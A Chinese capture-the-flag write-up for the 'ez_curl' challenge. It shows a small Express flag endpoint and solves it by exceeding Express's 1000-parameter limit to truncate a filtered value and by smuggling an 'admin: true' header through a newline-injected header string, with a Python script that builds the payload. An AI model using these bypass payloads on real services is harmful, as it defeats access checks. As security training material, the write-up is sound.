[CTF]攻防世界:ez_curl

题目:EZ_CURL

提示:php审计 noed.js

c 复制代码
app.js

const express = require('express');

const app = express();

const port = 3000;
const flag = process.env.flag;

app.get('/flag', (req, res) => {
    if(!req.query.admin.includes('false') && req.headers.admin.includes('true')){
        res.send(flag);
    }else{
        res.send('try hard');
    }
});

app.listen({ port: port , host: '0.0.0.0'});

req.query.admin.includes:要求在URL中admin字段的值不包含"false"子串(必须要有admin字段)

req.headers.admin.includes:要求在报文头部中admin字段的值包含"true"子串


步骤

1、绕过URL

在NodeJS中有以下知识点:express的parameterLimit默认为1000,即当参数个数大于1000时,后面的参数将被截断。

当我们给params赋值的成员个数大于1000时,即可让$url中admin=false被截断。

2、绕过headers的判断

1、换行符截断

c 复制代码
{"headers": ["xx:xx\nadmin: true"]}

admin和true字符串都在第一个冒号后,而在NodeJS解析时,会解析得到admin的字段为true.

2、node.js解析

c 复制代码
{"headers": ["admin: x", " true: y"]}

admin和true是分开的两个数组,不会同时满足过滤条件,所以可以绕过PHP文件的判断。在正常解析过程中,在键名中是不允许存在空格的,但NodeJS在遇到这类情况时是宽容的,会将其解析成 admin:x true y

3、拿到flag

c 复制代码
import json

datas = {"headers":["xx:xx\nadmin:true"],
         "params":{"admin":"true"}}

for i in range(1002):
    datas["params"]["s"+str(i)] = i

json1 = json.dumps(datas)
print(json1)
相关推荐
Doro再努力13 小时前
【Linux操作系统10】Makefile深度解析:从依赖推导到有效编译
android·linux·运维·服务器·编辑器·vim
Daniel李华13 小时前
echarts使用案例
android·javascript·echarts
黑客老李13 小时前
web渗透实战 | js.map文件泄露导致的通杀漏洞
安全·web安全·小程序·黑客入门·渗透测试实战
做人不要太理性14 小时前
CANN Runtime 运行时组件深度解析:任务调度机制、存储管理策略与维测体系构建逻辑
android·运维·魔珐星云
我命由我1234514 小时前
Android 广播 - 静态注册与动态注册对广播接收器实例创建的影响
android·java·开发语言·java-ee·android studio·android-studio·android runtime
朗迹 - 张伟15 小时前
Tauri2 导出 Android 详细教程
android
lpruoyu15 小时前
【Android第一行代码学习笔记】Android架构_四大组件_权限_持久化_通知_异步_服务
android·笔记·学习
独自破碎E16 小时前
【BISHI15】小红的夹吃棋
android·java·开发语言
李堇19 小时前
android滚动列表VerticalRollingTextView
android·java
lxysbly20 小时前
n64模拟器安卓版带金手指2026
android